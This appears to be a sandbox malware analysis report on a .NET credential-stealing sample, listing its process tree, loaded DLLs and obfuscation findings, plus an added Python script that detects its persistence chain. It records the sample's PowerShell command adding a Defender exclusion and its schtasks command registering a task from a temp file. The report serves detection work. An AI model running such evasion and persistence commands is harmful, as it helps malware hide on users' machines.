Source: UOEAjWmusE.exe (00000007.00000002.3767694744.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, 00000007.00000002.3770064855.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, 00000007.00000002.3767694744.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, 00000007.00000002.3767694744.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, 00000007.00000002.3767694744.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, 00000007.00000002.3767694744.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp); gJdonuKfIrqN.exe (0000000C.00000002.3768174332.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 0000000C.00000002.3768174332.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, 0000000C.00000002.3768174332.0000000002E63000.00000004.00000800.00020000.00000000.sdmp, 0000000C.00000002.3768174332.0000000002E70000.00000004.00000800.00020000.00000000.sdmp) | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); (this DDL is the password_notes table of the Chromium "Login Data" SQLite store, consistent with the browser-credential harvesting flagged in the signature list)
Source: UOEAjWmusE.exe | Virustotal: Detection: 74%
Source: UOEAjWmusE.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | File read: C:\Users\user\Desktop\UOEAjWmusE.exe
Source: unknown | Process created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Process created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
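The process list above is the whole persistence and evasion chain in three steps: PowerShell adds a Defender exclusion for the file the sample dropped, schtasks registers a task from an XML in %TEMP%, and the sample launches a second copy of its own image (the child that the injection signatures refer to). Those three steps are what a detection engineer keys on, independently of the hashes. The Python below is an added example, not part of this Joe Sandbox report or of the sample: it runs the three checks over process-creation records constructed to mirror this report's process tree. The PIDs are invented, the record fields follow a generic Sysmon Event ID 1 layout (an assumption), and the function and tag names are the example's own.

```python
"""Triage process-creation records for the exclusion / temp-task / self-spawn
chain shown in the report. Added example, not from the report or the sample.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1-style fields, assumed)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


# Constructed records mirroring the report's process tree; PIDs are invented.
DESKTOP = r"C:\Users\user\Desktop\UOEAjWmusE.exe"
EVENTS = [
    ProcEvent(100, DESKTOP, f'"{DESKTOP}"', r"C:\Windows\explorer.exe"),
    ProcEvent(101, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"',
              DESKTOP),
    ProcEvent(102, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"',
              DESKTOP),
    ProcEvent(103, DESKTOP, f'"{DESKTOP}"', DESKTOP),
    # Benign control record: no finding should be raised for it.
    ProcEvent(104, r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
]

# Any Defender exclusion cmdlet parameter, not only -ExclusionPath.
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I)
# schtasks /Create ... /XML <file>: capture the XML path (quoted or not).
TASK_XML_RE = re.compile(r'/Create\b.*?/XML\s+"?([^"\s]+)', re.I)
# Temp directories from which a task definition should never be imported.
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)

REQUIRED = {"defender_exclusion", "task_from_temp_xml", "self_spawn"}


def basename(path: str) -> str:
    """Last path component, lower-cased, so SysWOW64 and System32 compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events) -> list:
    """Return (pid, tag) findings in event order."""
    findings = []
    for e in events:
        base = basename(e.image)
        # Step 1: the sample whitelists its own drop path in Defender.
        if base == "powershell.exe" and EXCLUSION_RE.search(e.cmdline):
            findings.append((e.pid, "defender_exclusion"))
        # Step 2: task registered from an XML in a temp directory.
        if base == "schtasks.exe":
            m = TASK_XML_RE.search(e.cmdline)
            if m and TEMP_DIR_RE.search(m.group(1)):
                findings.append((e.pid, "task_from_temp_xml"))
        # Step 3: a process launching its own image, the usual prelude to
        # hollowing the child and running the unpacked payload inside it.
        if e.image.lower() == e.parent_image.lower():
            findings.append((e.pid, "self_spawn"))
    return findings


def full_chain(findings) -> bool:
    """True when every stage of the chain is present in the findings."""
    return REQUIRED <= {tag for _, tag in findings}


if __name__ == "__main__":
    hits = triage(EVENTS)
    for pid, tag in hits:
        print(pid, tag)
    print("full chain:", full_chain(hits))
```

Each check maps to something in this report: the temp-XML check is the condition behind the "Scheduled temp file as task from temp location" Sigma hit, the exclusion check covers the Add-MpPreference line, and the self-spawn check is the cheap proxy for the injection the signatures describe. The self-spawn rule is noisy on its own (browsers and Office applications routinely launch their own image), so it should be allow-listed or only escalated when the other two stages appear from the same parent, which is what full_chain expresses.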
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, ntmarta.dll, sspicli.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, dpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, miutils.dll, gpapi.dll
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Section loaded: dpapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: UOEAjWmusE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: UOEAjWmusE.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: UOEAjWmusE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: gATZ.pdbSHA256% source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
                  Source: Binary string: gATZ.pdb source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr

                  Data Obfuscation

                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.cs .Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.cs .Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.cs .Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.55c0000.4.raw.unpack, MainForm.cs .Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Code function: 0_2_053D46B8 pushad ; retf 0_2_053D46B9
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Code function: 0_2_053D387B pushfd ; ret 0_2_053D3881
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Code function: 0_2_053DDA4B push ecx; ret 0_2_053DDA4C
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Code function: 0_2_059B296A push ebx; iretd 0_2_059B2A4C
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Code function: 12_2_0111F273 push ebp; retf 12_2_0111F281
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe Code function: 12_2_01117E59 push edx; ret 12_2_01117E5A
                  Source: UOEAjWmusE.exe Static PE information: section name: .text entropy: 7.495982404795054
                  Source: gJdonuKfIrqN.exe.0.dr Static PE information: section name: .text entropy: 7.495982404795054
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ykwq833Z6B34s0VEfhO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SChdqw9LmL', 'YtodEci6Vc', 'whBdx4EvCw', 'aYpdKE7Iak', 'SxOdVaVCrI', 'J9KdiWTVoc', 'VCZdJbWmSo'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, X7jrSvhQLCk3tcEVBO.cs High entropy of concatenated method names: 'Lqbet3XrpT', 'yepeFRTUMv', 'vvgepHf6w4', 'spYeh5uQUR', 'bkYeRBBNfJ', 'mFbeCmfPEs', 'eIxekiHMYK', 'E0GeXiTul5', 'i6JecjWPiE', 'B0bednuIjv'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, uSEF6mPAc9wdH36276.cs High entropy of concatenated method names: 'BFk8o7eh1k', 'vjg8WmN7Tp', 'c6P8Y9kVMv', 'iKo8tJTluc', 'NwP8NWNrID', 'Af98FjeEJj', 'NWk8SRZXy1', 'rML8p5tw03', 'oym8hAmrY1', 'fEJ8639kWA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, KJ5FuO6XoQatL5oLIw.cs High entropy of concatenated method names: 'xTi4NhFv4Z', 'hiZ4SMGQ7r', 'QsGevD00J1', 'nUUe2Ph6TR', 'ojDeOsIMnY', 'gGmefpFBsc', 'XU3e518Mcp', 'LSiewmIYWF', 'OucePwld3h', 'dc5e7fiR7a'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ihJ4FBKXUtjaE3ggN7.cs High entropy of concatenated method names: 'B9xR7ZXdOv', 'TtXREu5toR', 'bCNRK2B8hT', 'FXqRVvK8AG', 'Te8R1xAI8V', 'oEyRvnLxJC', 'afWR2uoyXv', 'CZEROdSHhD', 'OkDRfERTHp', 'XpKR5SokOX'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, pAofq3JBjTtJlGsXSM.cs High entropy of concatenated method names: 'esukDZONPH', 'X77kQcwBHY', 'ToString', 'RHfkrrNPHl', 'Cdak0YfWQR', 'Bx4ke3CBDb', 'dyAk4oUEs8', 'GkgklViage', 'nIVk8JnjiD', 'OYZky5J6oa'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, U1KWHpiL3OAw2XEwe2.cs High entropy of concatenated method names: 'ToString', 'uyECqB6txv', 'r5nC1AWgZK', 'WteCvY9Opv', 'pg3C2PxUeI', 'IOyCOE20Kr', 'i6MCfnLiVw', 'jjcC5BsRRa', 'cm7Cw83Orp', 'kHaCPbwxPX'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, DO0t4SpngkX2NaXBd4.cs High entropy of concatenated method names: 'GHJ0KRk8XU', 'rYq0VxYhdQ', 'dWp0ijNjTd', 'a8r0J6iNHT', 'hlO0MfHkiI', 'xFE0UOifdT', 'Yyf0je3bnu', 'cc40BjiMhN', 'CtT0ambyAn', 'mjh0G598i1'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ALe4H1aZrGP7WZgId3.cs High entropy of concatenated method names: 'dAac9HFTDg', 'JXrc1MnFFT', 'rkVcvVmXTx', 'GTCc2kF7wW', 'AntcOudjc6', 'JQIcfS3AQw', 'Bgrc5omRXh', 'H1ycwkEMqL', 'qw1cPOR4Gl', 'Mv1c7ix2bh'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ah53opGUxTfCHXjgD8.cs High entropy of concatenated method names: 'NuydesgTHH', 'hpOd4BmPXM', 'OP1dleVxfx', 'hK2d86pw9n', 'aqqdcB343u', 'vo2dyDjIWI', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, to3XjkU4G0PFJ9T0Kr.cs High entropy of concatenated method names: 'SMykBk8dth', 'pCqkGByyNm', 'JwAXZcsjRF', 'X7rX3uofVm', 'uMJkqTaRTm', 'ROQkELKVwD', 'HalkxBVOLR', 'lFtkK4BlWd', 'ao4kV5Yo6W', 'q0nkiEfP9q'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.cs High entropy of concatenated method names: 'eoAgns4WsC', 'oewgrIdyn9', 'FThg0CQurM', 'tt0ge7rQb6', 'Cdxg4A92dg', 'NSngltJugh', 'cqmg8SThhh', 'arDgycGxxP', 'UTggAcMUNr', 'g2jgDcJfwf'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, xQPiMs0Su5EiSHtEVc.cs High entropy of concatenated method names: 'Dispose', 'CwA3aOX9aO', 'kkWI15meV3', 'OuYWgVV7FW', 'AKm3GFmnwp', 'Vo23z8VPZD', 'ProcessDialogKey', 'NItIZLe4H1', 'arGI3P7WZg', 'cd3IIZh53o'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, FZAVh29FgqEruZXF2d.cs High entropy of concatenated method names: 'I2llnKLLOD', 'qrcl022U06', 'zFil4GIPKQ', 'rH2l8rtolS', 'TF5lyEyVnp', 'BwF4MgLqgB', 'mmv4UtQav6', 'xTw4jaltOx', 'MeY4BngpOi', 'EZP4aby8S2'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, VZ6G5a33HLJq5VC6DiA.cs High entropy of concatenated method names: 'ivMdGGxVgR', 'S8pdze52nK', 'tJ2LZhrfkN', 'vGXL36Csca', 'QjALIKsyJs', 'bA0LgWCOIo', 'UPOLTwiidv', 'nYuLnv6Owy', 'hVhLrhtaZ2', 'Kt9L0v7WXW'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, LZKDRPI5m93416evaE.cs High entropy of concatenated method names: 'T4oYNrwkJ', 'NIZt6Xs1a', 'k1iFGsvfS', 'SgPSGelPd', 'FXIhhdpZ6', 'LQG64GFtU', 'DF7ricaPu4pE9LJJjs', 'g6e4FWCbSEnwyrYgAt', 'i7kXiOGeH', 'JrXdJ6HiN'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, StXgmoxJK0VbLhPolI.cs High entropy of concatenated method names: 'PjkmpTPNWc', 'WPOmhHfjmC', 'jINm9aaNLV', 'J2fm1Z9dNC', 'G8tm2kx90h', 'JiOmOF4CEp', 'ce1m5WjHvO', 'PplmwrMq3P', 'D9Nm7QvJOp', 'BYsmqZZ9og'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, jReNHLjXOSwAOX9aOt.cs High entropy of concatenated method names: 'AChcR2nSji', 'xa4ckfAS7Y', 'iGRcc5rewK', 'j3qcLG9HUM', 'EKEcuvN0MS', 'I8qcsnf9LB', 'Dispose', 'N8XXrsbjKp', 'sNYX0vn4Ru', 'Y1AXeA4cPA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, v28Va1zOGSaDoSRTxf.cs High entropy of concatenated method names: 'FG9dFa0y9R', 'xGEdpPtRES', 'QiYdhQvcD5', 'Im0d9DeQTX', 'xkTd1hEha5', 'yGRd2NGPaR', 'XHydOdHUjY', 'HrKdsfft78', 'LxKdoOPPib', 'xTgdWybeqc'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, zDbEFX5MNIQlmgofDa.cs High entropy of concatenated method names: 'VJD8rgLbCE', 'Anr8eocsSE', 'Cc28lx16QL', 'jrblG1urGk', 'LSvlze9XTo', 'ABK8Zi2pFR', 'Qia83BX9EZ', 'a7G8Ikr8Bh', 'xaB8gLBiZG', 'HNT8Tt4vGA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, A0hF9CTSjuKdGsFWh7.cs High entropy of concatenated method names: 'QHp38O0t4S', 'egk3yX2NaX', 'HQL3DCk3tc', 'PVB3QO5J5F', 'LoL3RIw6ZA', 'Sh23CFgqEr', 'tai0JrrS3hy1ypYyiK', 'H8XS5NFrqFUSIG8IyC', 'DLL33MpYNY', 'M9R3geTFe6'
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe File created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
